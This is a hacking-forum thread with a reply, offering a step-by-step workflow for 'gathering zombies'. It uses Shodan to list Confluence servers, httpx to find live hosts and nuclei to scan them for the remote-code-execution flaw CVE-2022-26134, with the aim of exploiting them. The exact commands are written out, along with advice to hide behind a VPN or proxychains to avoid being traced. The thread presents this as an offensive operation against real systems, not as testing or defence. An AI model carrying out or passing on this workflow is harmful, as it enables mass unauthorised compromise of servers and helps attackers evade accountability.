How to gather zombies using shodan

[24]

Hello, this is my second thread on this forum anyways here is a few way to gather zombies using shodan. NOTE: if you have a .edu mail it will work even more better cuz of the limitation)

Requirements:

1. linux machine
   
2. shodan api (free version is ok but with .edu domain is better)
   
3. vpn (Recommend protonVPN or mulVAD)
   
4. nuclei engine (https://github.com/projectdiscovery/nuclei) and nuclei templates (https://github.com/projectdiscovery/nuclei-templates)
   
5. httpx to check for live hosts
   
6. PoC of the cve
   

ATTENTION:
IF YOU DO NOT KNOW HOW TO HIDE YOURSELF THEN DON'T TRY IT.
NOTE : we will use "X-Confluence" CVE-2022-26134 this can work on almost any other RCE cves.remember to do some research on the CVE that your trying to gather and exploit.
First we will gather our zombies:
cmd:"shodan search "X-Confluence" --fields ip_str,port --separator : --limit 100 > hosts.txt"
Second we will check for alive hosts using httpx:
cmd:"cat hosts.txt | httpx > alive_hosts.txt"
Third we will scan for vulnerable hosts with nuclei engine: (after the installation "cd to nuclei-templates/cves/2022" )
cmd:"nuclei -bs 50 -c 50 -l alive_hosts.txt -t CVE-2022-26134.yaml"
That all thx for reading this post always remember,stay safe and keep hacking!
proof pics:
+++ https://anonfiles.com/EbLf21L3ye/prove1_png +++
+++ https://anonfiles.com/W3L823L2y8/proove_png +++
Happy Hacking!

---

This is a bump

[177]

looking on this large requests sending vpn can leaking your IP, I think proxy (proxychains) is better with not leaked option.